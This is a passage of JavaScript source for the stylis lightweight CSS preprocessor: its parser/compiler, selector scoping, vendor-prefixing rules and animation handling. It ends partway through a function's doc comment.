 *          __        ___
 *    _____/ /___  __/ (_)____
 *   / ___/ __/ / / / / / ___/
 *  (__  ) /_/ /_/ / / (__  )
 * /____/\__/\__, /_/_/____/
 *          /____/
 *
 * light - weight css preprocessor @licence MIT
 */
(function (factory) {/* eslint-disable */
	 true ? (module['exports'] = factory(null)) :
		typeof define === 'function' && define['amd'] ? define(factory(null)) :
			(window['stylis'] = factory(null))
}(/** @param {*=} options */function factory (options) {/* eslint-disable */

	'use strict'

	/**
	 * Notes
	 *
	 * The ['<method name>'] pattern is used to support closure compiler
	 * the jsdoc signatures are also used to the same effect
	 *
	 * ----
	 *
	 * int + int + int === n4 [faster]
	 *
	 * vs
	 *
	 * int === n1 && int === n2 && int === n3
	 *
	 * ----
	 *
	 * switch (int) { case ints...} [faster]
	 *
	 * vs
	 *
	 * if (int == 1 && int === 2 ...)
	 *
	 * ----
	 *
	 * The (first*n1 + second*n2 + third*n3) format used in the property parser
	 * is a simple way to hash the sequence of characters
	 * taking into account the index they occur in
	 * since any number of 3 character sequences could produce duplicates.
	 *
	 * On the other hand sequences that are directly tied to the index of the character
	 * resolve a far more accurate measure, it's also faster
	 * to evaluate one condition in a switch statement
	 * than three in an if statement regardless of the added math.
	 *
	 * This allows the vendor prefixer to be both small and fast.
	 */

	var nullptn = /^\0+/g /* matches leading null characters */
	var formatptn = /[\0\r\f]/g /* matches new line, null and formfeed characters */
	var colonptn = /: */g /* splits animation rules */
	var cursorptn = /zoo|gra/ /* assert cursor varient */
	var transformptn = /([,: ])(transform)/g /* vendor prefix transform, older webkit */
	var animationptn = /,+\s*(?![^(]*[)])/g /* splits multiple shorthand notation animations */
	var propertiesptn = / +\s*(?![^(]*[)])/g /* animation properties */
	var elementptn = / *[\0] */g /* selector elements */
	var selectorptn = /,\r+?/g /* splits selectors */
	var andptn = /([\t\r\n ])*\f?&/g /* match & */
	var escapeptn = /:global\(((?:[^\(\)\[\]]*|\[.*\]|\([^\(\)]*\))*)\)/g /* matches :global(.*) */
	var invalidptn = /\W+/g /* removes invalid characters from keyframes */
	var keyframeptn = /@(k\w+)\s*(\S*)\s*/ /* matches @keyframes $1 */
	var plcholdrptn = /::(place)/g /* match ::placeholder varient */
	var readonlyptn = /:(read-only)/g /* match :read-only varient */
	var beforeptn = /\s+(?=[{\];=:>])/g /* matches \s before ] ; = : */
	var afterptn = /([[}=:>])\s+/g /* matches \s after characters [ } = : */
	var tailptn = /(\{[^{]+?);(?=\})/g /* matches tail semi-colons ;} */
	var whiteptn = /\s{2,}/g /* matches repeating whitespace */
	var pseudoptn = /([^\(])(:+) */g /* pseudo element */
	var writingptn = /[svh]\w+-[tblr]{2}/ /* match writing mode property values */
	var gradientptn = /([\w-]+t\()/g /* match *gradient property */
	var supportsptn = /\(\s*(.*)\s*\)/g /* match supports (groups) */
	var propertyptn = /([\s\S]*?);/g /* match properties leading semicolon */
	var selfptn = /-self|flex-/g /* match flex- and -self in align-self: flex-*; */
	var pseudofmt = /[^]*?(:[rp][el]a[\w-]+)[^]*/ /* extrats :readonly or :placholder from selector */
	var trimptn = /[ \t]+$/ /* match tail whitspace */
	var dimensionptn = /stretch|:\s*\w+\-(?:conte|avail)/ /* match max/min/fit-content, fill-available */
	var imgsrcptn = /([^-])(image-set\()/

	/* vendors */
	var webkit = '-webkit-'
	var moz = '-moz-'
	var ms = '-ms-'

	/* character codes */
	var SEMICOLON = 59 /* ; */
	var CLOSEBRACES = 125 /* } */
	var OPENBRACES = 123 /* { */
	var OPENPARENTHESES = 40 /* ( */
	var CLOSEPARENTHESES = 41 /* ) */
	var OPENBRACKET = 91 /* [ */
	var CLOSEBRACKET = 93 /* ] */
	var NEWLINE = 10 /* \n */
	var CARRIAGE = 13 /* \r */
	var TAB = 9 /* \t */
	var AT = 64 /* @ */
	var SPACE = 32 /*   */
	var AND = 38 /* & */
	var DASH = 45 /* - */
	var UNDERSCORE = 95 /* _ */
	var STAR = 42 /* * */
	var COMMA = 44 /* , */
	var COLON = 58 /* : */
	var SINGLEQUOTE = 39 /* ' */
	var DOUBLEQUOTE = 34 /* " */
	var FOWARDSLASH = 47 /* / */
	var GREATERTHAN = 62 /* > */
	var PLUS = 43 /* + */
	var TILDE = 126 /* ~ */
	var NULL = 0 /* \0 */
	var FORMFEED = 12 /* \f */
	var VERTICALTAB = 11 /* \v */

	/* special identifiers */
	var KEYFRAME = 107 /* k */
	var MEDIA = 109 /* m */
	var SUPPORTS = 115 /* s */
	var PLACEHOLDER = 112 /* p */
	var READONLY = 111 /* o */
	var IMPORT = 105 /* <at>i */
	var CHARSET = 99 /* <at>c */
	var DOCUMENT = 100 /* <at>d */
	var PAGE = 112 /* <at>p */

	var column = 1 /* current column */
	var line = 1 /* current line numebr */
	var pattern = 0 /* :pattern */

	var cascade = 1 /* #id h1 h2 vs h1#id h2#id  */
	var prefix = 1 /* vendor prefix */
	var escape = 1 /* escape :global() pattern */
	var compress = 0 /* compress output */
	var semicolon = 0 /* no/semicolon option */
	var preserve = 0 /* preserve empty selectors */

	/* empty reference */
	var array = []

	/* plugins */
	var plugins = []
	var plugged = 0
	var should = null

	/* plugin context */
	var POSTS = -2
	var PREPS = -1
	var UNKWN = 0
	var PROPS = 1
	var BLCKS = 2
	var ATRUL = 3

	/* plugin newline context */
	var unkwn = 0

	/* keyframe animation */
	var keyed = 1
	var key = ''

	/* selector namespace */
	var nscopealt = ''
	var nscope = ''

	/**
	 * Compile
	 *
	 * @param {Array<string>} parent
	 * @param {Array<string>} current
	 * @param {string} body
	 * @param {number} id
	 * @param {number} depth
	 * @return {string}
	 */
	function compile (parent, current, body, id, depth) {
		var bracket = 0 /* brackets [] */
		var comment = 0 /* comments /* // or /* */
		var parentheses = 0 /* functions () */
		var quote = 0 /* quotes '', "" */

		var first = 0 /* first character code */
		var second = 0 /* second character code */
		var code = 0 /* current character code */
		var tail = 0 /* previous character code */
		var trail = 0 /* character before previous code */
		var peak = 0 /* previous non-whitespace code */

		var counter = 0 /* count sequence termination */
		var context = 0 /* track current context */
		var atrule = 0 /* track @at-rule context */
		var pseudo = 0 /* track pseudo token index */
		var caret = 0 /* current character index */
		var format = 0 /* control character formating context */
		var insert = 0 /* auto semicolon insertion */
		var invert = 0 /* inverted selector pattern */
		var length = 0 /* generic length address */
		var eof = body.length /* end of file(length) */
		var eol = eof - 1 /* end of file(characters) */

		var char = '' /* current character */
		var chars = '' /* current buffer of characters */
		var child = '' /* next buffer of characters */
		var out = '' /* compiled body */
		var children = '' /* compiled children */
		var flat = '' /* compiled leafs */
		var selector /* generic selector address */
		var result /* generic address */

		// ...build body
		while (caret < eof) {
			code = body.charCodeAt(caret)

			// eof varient
			if (caret === eol) {
				// last character + noop context, add synthetic padding for noop context to terminate
				if (comment + quote + parentheses + bracket !== 0) {
					if (comment !== 0) {
						code = comment === FOWARDSLASH ? NEWLINE : FOWARDSLASH
					}

					quote = parentheses = bracket = 0
					eof++
					eol++
				}
			}

			if (comment + quote + parentheses + bracket === 0) {
				// eof varient
				if (caret === eol) {
					if (format > 0) {
						chars = chars.replace(formatptn, '')
					}

					if (chars.trim().length > 0) {
						switch (code) {
							case SPACE:
							case TAB:
							case SEMICOLON:
							case CARRIAGE:
							case NEWLINE: {
								break
							}
							default: {
								chars += body.charAt(caret)
							}
						}

						code = SEMICOLON
					}
				}

				// auto semicolon insertion
				if (insert === 1) {
					switch (code) {
						// false flags
						case OPENBRACES:
						case CLOSEBRACES:
						case SEMICOLON:
						case DOUBLEQUOTE:
						case SINGLEQUOTE:
						case OPENPARENTHESES:
						case CLOSEPARENTHESES:
						case COMMA: {
							insert = 0
						}
						// ignore
						case TAB:
						case CARRIAGE:
						case NEWLINE:
						case SPACE: {
							break
						}
						// valid
						default: {
							insert = 0
							length = caret
							first = code
							caret--
							code = SEMICOLON

							while (length < eof) {
								switch (body.charCodeAt(length++)) {
									case NEWLINE:
									case CARRIAGE:
									case SEMICOLON: {
										++caret
										code = first
										length = eof
										break
									}
									case COLON: {
										if (format > 0) {
											++caret
											code = first
										}
									}
									case OPENBRACES: {
										length = eof
									}
								}
							}
						}
					}
				}

				// token varient
				switch (code) {
					case OPENBRACES: {
						chars = chars.trim()
						first = chars.charCodeAt(0)
						counter = 1
						length = ++caret

						while (caret < eof) {
							switch (code = body.charCodeAt(caret)) {
								case OPENBRACES: {
									counter++
									break
								}
								case CLOSEBRACES: {
									counter--
									break
								}
								case FOWARDSLASH: {
									switch (second = body.charCodeAt(caret + 1)) {
										// /*, //
										case STAR:
										case FOWARDSLASH: {
											caret = delimited(second, caret, eol, body)
										}
									}
									break
								}
								// given "[" === 91 & "]" === 93 hence forth 91 + 1 + 1 === 93
								case OPENBRACKET: {
									code++
								}
								// given "(" === 40 & ")" === 41 hence forth 40 + 1 === 41
								case OPENPARENTHESES: {
									code++
								}
								// quote tail delimiter is identical to the head delimiter hence noop,
								// fallthrough clauses have been shifted to the correct tail delimiter
								case DOUBLEQUOTE:
								case SINGLEQUOTE: {
									while (caret++ < eol) {
										if (body.charCodeAt(caret) === code) {
											break
										}
									}
								}
							}

							if (counter === 0) {
								break
							}

							caret++
						}

						child = body.substring(length, caret)

						if (first === NULL) {
							first = (chars = chars.replace(nullptn, '').trim()).charCodeAt(0)
						}

						switch (first) {
							// @at-rule
							case AT: {
								if (format > 0) {
									chars = chars.replace(formatptn, '')
								}

								second = chars.charCodeAt(1)

								switch (second) {
									case DOCUMENT:
									case MEDIA:
									case SUPPORTS:
									case DASH: {
										selector = current
										break
									}
									default: {
										selector = array
									}
								}

								child = compile(current, selector, child, second, depth+1)
								length = child.length

								// preserve empty @at-rule
								if (preserve > 0 && length === 0) {
									length = chars.length
								}

								// execute plugins, @at-rule context
								if (plugged > 0) {
									selector = select(array, chars, invert)
									result = proxy(ATRUL, child, selector, current, line, column, length, second, depth, id)
									chars = selector.join('')

									if (result !== void 0) {
										if ((length = (child = result.trim()).length) === 0) {
											second = 0
											child = ''
										}
									}
								}

								if (length > 0) {
									switch (second) {
										case SUPPORTS: {
											chars = chars.replace(supportsptn, supports)
										}
										case DOCUMENT:
										case MEDIA:
										case DASH: {
											child = chars + '{' + child + '}'
											break
										}
										case KEYFRAME: {
											chars = chars.replace(keyframeptn, '$1 $2' + (keyed > 0 ? key : ''))
											child = chars + '{' + child + '}'

											if (prefix === 1 || (prefix === 2 && vendor('@'+child, 3))) {
												child = '@' + webkit + child + '@' + child
											} else {
												child = '@' + child
											}
											break
										}
										default: {
											child = chars + child

											if (id === PAGE) {
												child = (out += child, '')
											}
										}
									}
								} else {
									child = ''
								}

								break
							}
							// selector
							default: {
								child = compile(current, select(current, chars, invert), child, id, depth+1)
							}
						}

						children += child

						// reset
						context = 0
						insert = 0
						pseudo = 0
						format = 0
						invert = 0
						atrule = 0
						chars = ''
						child = ''
						code = body.charCodeAt(++caret)
						break
					}
					case CLOSEBRACES:
					case SEMICOLON: {
						chars = (format > 0 ? chars.replace(formatptn, '') : chars).trim()

						if ((length = chars.length) > 1) {
							// monkey-patch missing colon
							if (pseudo === 0) {
								first = chars.charCodeAt(0)

								// first character is a letter or dash, buffer has a space character
								if ((first === DASH || first > 96 && first < 123)) {
									length = (chars = chars.replace(' ', ':')).length
								}
							}

							// execute plugins, property context
							if (plugged > 0) {
								if ((result = proxy(PROPS, chars, current, parent, line, column, out.length, id, depth, id)) !== void 0) {
									if ((length = (chars = result.trim()).length) === 0) {
										chars = '\0\0'
									}
								}
							}

							first = chars.charCodeAt(0)
							second = chars.charCodeAt(1)

							switch (first) {
								case NULL: {
									break
								}
								case AT: {
									if (second === IMPORT || second === CHARSET) {
										flat += chars + body.charAt(caret)
										break
									}
								}
								default: {
									if (chars.charCodeAt(length-1) === COLON) {
										break
									}

									out += property(chars, first, second, chars.charCodeAt(2))
								}
							}
						}

						// reset
						context = 0
						insert = 0
						pseudo = 0
						format = 0
						invert = 0
						chars = ''
						code = body.charCodeAt(++caret)
						break
					}
				}
			}

			// parse characters
			switch (code) {
				case CARRIAGE:
				case NEWLINE: {
					// auto insert semicolon
					if (comment + quote + parentheses + bracket + semicolon === 0) {
						// valid non-whitespace characters that
						// may precede a newline
						switch (peak) {
							case CLOSEPARENTHESES:
							case SINGLEQUOTE:
							case DOUBLEQUOTE:
							case AT:
							case TILDE:
							case GREATERTHAN:
							case STAR:
							case PLUS:
							case FOWARDSLASH:
							case DASH:
							case COLON:
							case COMMA:
							case SEMICOLON:
							case OPENBRACES:
							case CLOSEBRACES: {
								break
							}
							default: {
								// current buffer has a colon
								if (pseudo > 0) {
									insert = 1
								}
							}
						}
					}

					// terminate line comment
					if (comment === FOWARDSLASH) {
						comment = 0
					} else if (cascade + context === 0 && id !== KEYFRAME && chars.length > 0) {
						format = 1
						chars += '\0'
					}

					// execute plugins, newline context
					if (plugged * unkwn > 0) {
						proxy(UNKWN, chars, current, parent, line, column, out.length, id, depth, id)
					}

					// next line, reset column position
					column = 1
					line++
					break
				}
				case SEMICOLON:
				case CLOSEBRACES: {
					if (comment + quote + parentheses + bracket === 0) {
						column++
						break
					}
				}
				default: {
					// increment column position
					column++

					// current character
					char = body.charAt(caret)

					// remove comments, escape functions, strings, attributes and prepare selectors
					switch (code) {
						case TAB:
						case SPACE: {
							if (quote + bracket + comment === 0) {
								switch (tail) {
									case COMMA:
									case COLON:
									case TAB:
									case SPACE: {
										char = ''
										break
									}
									default: {
										if (code !== SPACE) {
											char = ' '
										}
									}
								}
							}
							break
						}
						// escape breaking control characters
						case NULL: {
							char = '\\0'
							break
						}
						case FORMFEED: {
							char = '\\f'
							break
						}
						case VERTICALTAB: {
							char = '\\v'
							break
						}
						// &
						case AND: {
							// inverted selector pattern i.e html &
							if (quote + comment + bracket === 0 && cascade > 0) {
								invert = 1
								format = 1
								char = '\f' + char
							}
							break
						}
						// ::p<l>aceholder, l
						// :read-on<l>y, l
						case 108: {
							if (quote + comment + bracket + pattern === 0 && pseudo > 0) {
								switch (caret - pseudo) {
									// ::placeholder
									case 2: {
										if (tail === PLACEHOLDER && body.charCodeAt(caret-3) === COLON) {
											pattern = tail
										}
									}
									// :read-only
									case 8: {
										if (trail === READONLY) {
											pattern = trail
										}
									}
								}
							}
							break
						}
						// :<pattern>
						case COLON: {
							if (quote + comment + bracket === 0) {
								pseudo = caret
							}
							break
						}
						// selectors
						case COMMA: {
							if (comment + parentheses + quote + bracket === 0) {
								format = 1
								char += '\r'
							}
							break
						}
						// quotes
						case DOUBLEQUOTE:
						case SINGLEQUOTE: {
							if (comment === 0) {
								quote = quote === code ? 0 : (quote === 0 ? code : quote)
							}
							break
						}
						// attributes
						case OPENBRACKET: {
							if (quote + comment + parentheses === 0) {
								bracket++
							}
							break
						}
						case CLOSEBRACKET: {
							if (quote + comment + parentheses === 0) {
								bracket--
							}
							break
						}
						// functions
						case CLOSEPARENTHESES: {
							if (quote + comment + bracket === 0) {
								parentheses--
							}
							break
						}
						case OPENPARENTHESES: {
							if (quote + comment + bracket === 0) {
								if (context === 0) {
									switch (tail*2 + trail*3) {
										// :matches
										case 533: {
											break
										}
										// :global, :not, :nth-child etc...
										default: {
											counter = 0
											context = 1
										}
									}
								}

								parentheses++
							}
							break
						}
						case AT: {
							if (comment + parentheses + quote + bracket + pseudo + atrule === 0) {
								atrule = 1
							}
							break
						}
						// block/line comments
						case STAR:
						case FOWARDSLASH: {
							if (quote + bracket + parentheses > 0) {
								break
							}

							switch (comment) {
								// initialize line/block comment context
								case 0: {
									switch (code*2 + body.charCodeAt(caret+1)*3) {
										// //
										case 235: {
											comment = FOWARDSLASH
											break
										}
										// /*
										case 220: {
											length = caret
											comment = STAR
											break
										}
									}
									break
								}
								// end block comment context
								case STAR: {
									if (code === FOWARDSLASH && tail === STAR && length + 2 !== caret) {
										// /*<!> ... */, !
										if (body.charCodeAt(length+2) === 33) {
											out += body.substring(length, caret+1)
										}
										char = ''
										comment = 0
									}
								}
							}
						}
					}

					// ignore comment blocks
					if (comment === 0) {
						// aggressive isolation mode, divide each individual selector
						// including selectors in :not function but excluding selectors in :global function
						if (cascade + quote + bracket + atrule === 0 && id !== KEYFRAME && code !== SEMICOLON) {
							switch (code) {
								case COMMA:
								case TILDE:
								case GREATERTHAN:
								case PLUS:
								case CLOSEPARENTHESES:
								case OPENPARENTHESES: {
									if (context === 0) {
										// outside of an isolated context i.e nth-child(<...>)
										switch (tail) {
											case TAB:
											case SPACE:
											case NEWLINE:
											case CARRIAGE: {
												char = char + '\0'
												break
											}
											default: {
												char = '\0' + char + (code === COMMA ? '' : '\0')
											}
										}
										format = 1
									} else {
										// within an isolated context, sleep untill it's terminated
										switch (code) {
											case OPENPARENTHESES: {
												// :globa<l>(
												if (pseudo + 7 === caret && tail === 108) {
													pseudo = 0
												}
												context = ++counter
												break
											}
											case CLOSEPARENTHESES: {
												if ((context = --counter) === 0) {
													format = 1
													char += '\0'
												}
												break
											}
										}
									}
									break
								}
								case TAB:
								case SPACE: {
									switch (tail) {
										case NULL:
										case OPENBRACES:
										case CLOSEBRACES:
										case SEMICOLON:
										case COMMA:
										case FORMFEED:
										case TAB:
										case SPACE:
										case NEWLINE:
										case CARRIAGE: {
											break
										}
										default: {
											// ignore in isolated contexts
											if (context === 0) {
												format = 1
												char += '\0'
											}
										}
									}
								}
							}
						}

						// concat buffer of characters
						chars += char

						// previous non-whitespace character code
						if (code !== SPACE && code !== TAB) {
							peak = code
						}
					}
				}
			}

			// tail character codes
			trail = tail
			tail = code

			// visit every character
			caret++
		}

		length = out.length

		// preserve empty selector
 		if (preserve > 0) {
 			if (length === 0 && children.length === 0 && (current[0].length === 0) === false) {
 				if (id !== MEDIA || (current.length === 1 && (cascade > 0 ? nscopealt : nscope) === current[0])) {
					length = current.join(',').length + 2
 				}
 			}
		}

		if (length > 0) {
			// cascade isolation mode?
			selector = cascade === 0 && id !== KEYFRAME ? isolate(current) : current

			// execute plugins, block context
			if (plugged > 0) {
				result = proxy(BLCKS, out, selector, parent, line, column, length, id, depth, id)

				if (result !== void 0 && (out = result).length === 0) {
					return flat + out + children
				}
			}

			out = selector.join(',') + '{' + out + '}'

			if (prefix*pattern !== 0) {
				if (prefix === 2 && !vendor(out, 2))
					pattern = 0

				switch (pattern) {
					// ::read-only
					case READONLY: {
						out = out.replace(readonlyptn, ':'+moz+'$1')+out
						break
					}
					// ::placeholder
					case PLACEHOLDER: {
						out = (
							out.replace(plcholdrptn, '::' + webkit + 'input-$1') +
							out.replace(plcholdrptn, '::' + moz + '$1') +
							out.replace(plcholdrptn, ':' + ms + 'input-$1') + out
						)
						break
					}
				}

				pattern = 0
			}
		}

		return flat + out + children
	}

	/**
	 * Select
	 *
	 * @param {Array<string>} parent
	 * @param {string} current
	 * @param {number} invert
	 * @return {Array<string>}
	 */
	function select (parent, current, invert) {
		var selectors = current.trim().split(selectorptn)
		var out = selectors

		var length = selectors.length
		var l = parent.length

		switch (l) {
			// 0-1 parent selectors
			case 0:
			case 1: {
				for (var i = 0, selector = l === 0 ? '' : parent[0] + ' '; i < length; ++i) {
					out[i] = scope(selector, out[i], invert, l).trim()
				}
				break
			}
			// >2 parent selectors, nested
			default: {
				for (var i = 0, j = 0, out = []; i < length; ++i) {
					for (var k = 0; k < l; ++k) {
						out[j++] = scope(parent[k] + ' ', selectors[i], invert, l).trim()
					}
				}
			}
		}

		return out
	}

	/**
	 * Scope
	 *
	 * @param {string} parent
	 * @param {string} current
	 * @param {number} invert
	 * @param {number} level
	 * @return {string}
	 */
	function scope (parent, current, invert, level) {
		var selector = current
		var code = selector.charCodeAt(0)

		// trim leading whitespace
		if (code < 33) {
			code = (selector = selector.trim()).charCodeAt(0)
		}

		switch (code) {
			// &
			case AND: {
				switch (cascade + level) {
					case 0:
					case 1: {
						if (parent.trim().length === 0) {
							break
						}
					}
					default: {
						return selector.replace(andptn, '$1'+parent.trim())
					}
				}
				break
			}
			// :
			case COLON: {
				switch (selector.charCodeAt(1)) {
					// g in :global
					case 103: {
						if (escape > 0 && cascade > 0) {
							return selector.replace(escapeptn, '$1').replace(andptn, '$1'+nscope)
						}
						break
					}
					default: {
						// :hover
						return parent.trim() + selector.replace(andptn, '$1'+parent.trim())
					}
				}
			}
			default: {
				// html &
				if (invert*cascade > 0 && selector.indexOf('\f') > 0) {
					return selector.replace(andptn, (parent.charCodeAt(0) === COLON ? '' : '$1')+parent.trim())
				}
			}
		}

		return parent + selector
	}

	/**
	 * Property
	 *
	 * @param {string} input
	 * @param {number} first
	 * @param {number} second
	 * @param {number} third
	 * @return {string}
	 */
	function property (input, first, second, third) {
		var index = 0
		var out = input + ';'
		var hash = (first*2) + (second*3) + (third*4)
		var cache

		// animation: a, n, i characters
		if (hash === 944) {
			return animation(out)
		} else if (prefix === 0 || (prefix === 2 && !vendor(out, 1))) {
			return out
		}

		// vendor prefix
		switch (hash) {
			// text-decoration/text-size-adjust/text-shadow/text-align/text-transform: t, e, x
			case 1015: {
				// text-shadow/text-align/text-transform, a
				return out.charCodeAt(10) === 97 ? webkit + out + out : out
			}
			// filter/fill f, i, l
			case 951: {
				// filter, t
				return out.charCodeAt(3) === 116 ? webkit + out + out : out
			}
			// color/column, c, o, l
			case 963: {
				// column, n
				return out.charCodeAt(5) === 110 ? webkit + out + out : out
			}
			// box-decoration-break, b, o, x
			case 1009: {
				if (out.charCodeAt(4) !== 100) {
					break
				}
			}
			// mask, m, a, s
			// clip-path, c, l, i
			case 969:
			case 942: {
				return webkit + out + out
			}
			// appearance: a, p, p
			case 978: {
				return webkit + out + moz + out + out
			}
			// hyphens: h, y, p
			// user-select: u, s, e
			case 1019:
			case 983: {
				return webkit + out + moz + out + ms + out + out
			}
			// background/backface-visibility, b, a, c
			case 883: {
				// backface-visibility, -
				if (out.charCodeAt(8) === DASH) {
					return webkit + out + out
				}

				// image-set(...)
				if (out.indexOf('image-set(', 11) > 0) {
					return out.replace(imgsrcptn, '$1'+webkit+'$2') + out
				}

				return out
			}
			// flex: f, l, e
			case 932: {
				if (out.charCodeAt(4) === DASH) {
					switch (out.charCodeAt(5)) {
						// flex-grow, g
						case 103: {
							return webkit + 'box-' + out.replace('-grow', '') + webkit + out + ms + out.replace('grow', 'positive') + out
						}
						// flex-shrink, s
						case 115: {
							return webkit + out + ms + out.replace('shrink', 'negative') + out
						}
						// flex-basis, b
						case 98: {
							return webkit + out + ms + out.replace('basis', 'preferred-size') + out
						}
					}
				}

				return webkit + out + ms + out + out
			}
			// order: o, r, d
			case 964: {
				return webkit + out + ms + 'flex' + '-' + out + out
			}
			// justify-items/justify-content, j, u, s
			case 1023: {
				// justify-content, c
				if (out.charCodeAt(8) !== 99) {
					break
				}

				cache = out.substring(out.indexOf(':', 15)).replace('flex-', '').replace('space-between', 'justify')
				return webkit + 'box-pack' + cache + webkit + out + ms + 'flex-pack' + cache + out
			}
			// cursor, c, u, r
			case 1005: {
				return cursorptn.test(out) ? out.replace(colonptn, ':' + webkit) + out.replace(colonptn, ':' + moz) + out : out
			}
			// writing-mode, w, r, i
			case 1000: {
				cache = out.substring(13).trim()
				index = cache.indexOf('-') + 1

				switch (cache.charCodeAt(0)+cache.charCodeAt(index)) {
					// vertical-lr
					case 226: {
						cache = out.replace(writingptn, 'tb')
						break
					}
					// vertical-rl
					case 232: {
						cache = out.replace(writingptn, 'tb-rl')
						break
					}
					// horizontal-tb
					case 220: {
						cache = out.replace(writingptn, 'lr')
						break
					}
					default: {
						return out
					}
				}

				return webkit + out + ms + cache + out
			}
			// position: sticky
			case 1017: {
				if (out.indexOf('sticky', 9) === -1) {
					return out
				}
			}
			// display(flex/inline-flex/inline-box): d, i, s
			case 975: {
				index = (out = input).length - 10
				cache = (out.charCodeAt(index) === 33 ? out.substring(0, index) : out).substring(input.indexOf(':', 7) + 1).trim()

				switch (hash = cache.charCodeAt(0) + (cache.charCodeAt(7)|0)) {
					// inline-
					case 203: {
						// inline-box
						if (cache.charCodeAt(8) < 111) {
							break
						}
					}
					// inline-box/sticky
					case 115: {
						out = out.replace(cache, webkit+cache)+';'+out
						break
					}
					// inline-flex
					// flex
					case 207:
					case 102: {
						out = (
							out.replace(cache, webkit+(hash > 102 ? 'inline-' : '')+'box')+';'+
							out.replace(cache, webkit+cache)+';'+
							out.replace(cache, ms+cache+'box')+';'+
							out
						)
					}
				}

				return out + ';'
			}
			// align-items, align-center, align-self: a, l, i, -
			case 938: {
				if (out.charCodeAt(5) === DASH) {
					switch (out.charCodeAt(6)) {
						// align-items, i
						case 105: {
							cache = out.replace('-items', '')
							return webkit + out + webkit + 'box-' + cache + ms + 'flex-' + cache + out
						}
						// align-self, s
						case 115: {
							return webkit + out + ms + 'flex-item-' + out.replace(selfptn, '') + out
						}
						// align-content
						default: {
							return webkit + out + ms + 'flex-line-pack' + out.replace('align-content', '').replace(selfptn, '') + out
						}
					}
				}
				break
			}
			// min/max
			case 973:
			case 989: {
				// min-/max- height/width/block-size/inline-size
				if (out.charCodeAt(3) !== DASH || out.charCodeAt(4) === 122) {
					break
				}
			}
			// height/width: min-content / width: max-content
			case 931:
			case 953: {
				if (dimensionptn.test(input) === true) {
					// stretch
					if ((cache = input.substring(input.indexOf(':') + 1)).charCodeAt(0) === 115)
						return property(input.replace('stretch', 'fill-available'), first, second, third).replace(':fill-available', ':stretch')
					else
						return out.replace(cache, webkit + cache) + out.replace(cache, moz + cache.replace('fill-', '')) + out
				}
				break
			}
			// transform, transition: t, r, a
			case 962: {
				out = webkit + out + (out.charCodeAt(5) === 102 ? ms + out : '') + out

				// transitions
				if (second + third === 211 && out.charCodeAt(13) === 105 && out.indexOf('transform', 10) > 0) {
					return out.substring(0, out.indexOf(';', 27) + 1).replace(transformptn, '$1' + webkit + '$2') + out
				}

				break
			}
		}

		return out
	}

	/**
	 * Vendor
	 *
	 * @param {string} content
	 * @param {number} context
	 * @return {boolean}
	 */
	function vendor (content, context) {
		var index = content.indexOf(context === 1 ? ':' : '{')
		var key = content.substring(0, context !== 3 ? index : 10)
		var value = content.substring(index + 1, content.length - 1)

		return should(context !== 2 ? key : key.replace(pseudofmt, '$1'), value, context)
	}

	/**
	 * Supports
	 *
	 * @param {string} match
	 * @param {string} group
	 * @return {string}
	 */
	function supports (match, group) {
		var out = property(group, group.charCodeAt(0), group.charCodeAt(1), group.charCodeAt(2))

		return out !== group+';' ? out.replace(propertyptn, ' or ($1)').substring(4) : '('+group+')'
	}

	/**
	 * Animation
	 *
	 * @param {string} input
	 * @return {string}
	 */
	function animation (input) {
		var length = input.length
		var index = input.indexOf(':', 9) + 1
		var declare = input.substring(0, index).trim()
		var out = input.substring(index, length-1).trim()

		switch (input.charCodeAt(9)*keyed) {
			case 0: {
				break
			}
			// animation-*, -
			case DASH: {
				// animation-name, n
				if (input.charCodeAt(10) !== 110) {
					break
				}
			}
			// animation/animation-name
			default: {
				// split in case of multiple animations
				var list = out.split((out = '', animationptn))

				for (var i = 0, index = 0, length = list.length; i < length; index = 0, ++i) {
					var value = list[i]
					var items = value.split(propertiesptn)

					while (value = items[index]) {
						var peak = value.charCodeAt(0)

						if (keyed === 1 && (
							// letters
							(peak > AT && peak < 90) || (peak > 96 && peak < 123) || peak === UNDERSCORE ||
							// dash but not in sequence i.e --
							(peak === DASH && value.charCodeAt(1) !== DASH)
						)) {
							// not a number/function
							switch (isNaN(parseFloat(value)) + (value.indexOf('(') !== -1)) {
								case 1: {
									switch (value) {
										// not a valid reserved keyword
										case 'infinite': case 'alternate': case 'backwards': case 'running':
										case 'normal': case 'forwards': case 'both': case 'none': case 'linear':
										case 'ease': case 'ease-in': case 'ease-out': case 'ease-in-out':
										case 'paused': case 'reverse': case 'alternate-reverse': case 'inherit':
										case 'initial': case 'unset': case 'step-start': case 'step-end': {
											break
										}
										default: {
											value += key
										}
									}
								}
							}
						}

						items[index++] = value
					}

					out += (i === 0 ? '' : ',') + items.join(' ')
				}
			}
		}

		out = declare + out + ';'

		if (prefix === 1 || (prefix === 2 && vendor(out, 1)))
			return webkit + out + out

		return out
	}

	/**
	 * Isolate
	 *
	 * @param {Array<string>} current
	 */
	function isolate (current) {
		for (var i = 0, length = current.length, selector = Array(length), padding, element; i < length; ++i) {
			// split individual elements in a selector i.e h1 h2 === [h1, h2]
			var elements = current[i].split(elementptn)
			var out = ''

			for (var j = 0, size = 0, tail = 0, code = 0, l = elements.length; j < l; ++j) {
				// empty element
				if ((size = (element = elements[j]).length) === 0 && l > 1) {
					continue
				}

				tail = out.charCodeAt(out.length-1)
				code = element.charCodeAt(0)
				padding = ''

				if (j !== 0) {
					// determine if we need padding
					switch (tail) {
						case STAR:
						case TILDE:
						case GREATERTHAN:
						case PLUS:
						case SPACE:
						case OPENPARENTHESES:  {
							break
						}
						default: {
							padding = ' '
						}
					}
				}

				switch (code) {
					case AND: {
						element = padding + nscopealt
					}
					case TILDE:
					case GREATERTHAN:
					case PLUS:
					case SPACE:
					case CLOSEPARENTHESES:
					case OPENPARENTHESES: {
						break
					}
					case OPENBRACKET: {
						element = padding + element + nscopealt
						break
					}
					case COLON: {
						switch (element.charCodeAt(1)*2 + element.charCodeAt(2)*3) {
							// :global
							case 530: {
								if (escape > 0) {
									element = padding + element.substring(8, size - 1)
									break
								}
							}
							// :hover, :nth-child(), ...
							default: {
								if (j < 1 || elements[j-1].length < 1) {
									element = padding + nscopealt + element
								}
							}
						}
						break
					}
					case COMMA: {
						padding = ''
					}
					default: {
						if (size > 1 && element.indexOf(':') > 0) {
							element = padding + element.replace(pseudoptn, '$1' + nscopealt + '$2')
						} else {
							element = padding + element + nscopealt
						}
					}
				}

				out += element
			}

			selector[i] = out.replace(formatptn, '').trim()
		}

		return selector
	}

	/**
	 * Proxy
	 *
	 * @param {number} context
	 * @param {string} content
